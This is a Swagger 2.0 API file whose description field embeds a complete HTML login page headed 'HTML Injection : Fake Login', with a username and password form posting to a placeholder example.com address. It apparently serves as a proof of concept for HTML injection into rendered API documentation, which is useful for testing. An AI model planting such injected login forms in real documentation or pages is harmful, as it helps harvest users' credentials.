swagger: '2.0'
info:
  version: 1.0.0
  title: Fake Login Page
  description: '<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Fake Login Page</title>
<style>
body, html {
    height: 100%;
    margin: 0;
    font-family: Arial, sans-serif;
}

.login-wrapper {
    display: flex;
    justify-content: center;
    align-items: center;
    height: 100vh;
    width: 100%;
    background: linear-gradient(135deg, #6a11cb, #2575fc); /* تغطية كاملة */
    background-size: cover;
    background-position: center;
}

.login-form {
    background: rgba(255, 255, 255, 0.95); /* شفاف قليلًا */
    padding: 40px;
    border-radius: 12px;
    box-shadow: 0 8px 20px rgba(0,0,0,0.3);
    width: 320px;
    text-align: center;
}

.login-form h1 {
    margin-bottom: 30px;
    font-size: 22px;
    color: #333;
}

.form-group {
    margin-bottom: 20px;
    text-align: left;
}

.form-group label {
    display: block;
    margin-bottom: 5px;
    font-weight: bold;
}

.form-group input {
    width: 100%;
    padding: 10px;
    box-sizing: border-box;
    border: 1px solid #ccc;
    border-radius: 6px;
}

button {
    width: 100%;
    padding: 12px;
    background-color: #6a11cb;
    color: #fff;
    border: none;
    border-radius: 6px;
    cursor: pointer;
    font-size: 16px;
}

button:hover {
    background-color: #2575fc;
}
</style>
</head>
<body>
<div class="login-wrapper">
    <div class="login-form">
        <h1>HTML Injection : Fake Login</h1>
        <form action="https://example.com/login" method="post">
            <div class="form-group">
                <label for="username">Username</label>
                <input type="text" name="username" size="20">
            </div>
            <div class="form-group">
                <label for="password">Password</label>
                <input type="password" name="password" size="20">
            </div>
            <div class="form-group">
                <button type="submit">Login</button>
            </div>
        </form>
    </div>
</div>
</body>
</html>'
paths:
  /:
    post:
      responses:
        '200':
          description: Login successful
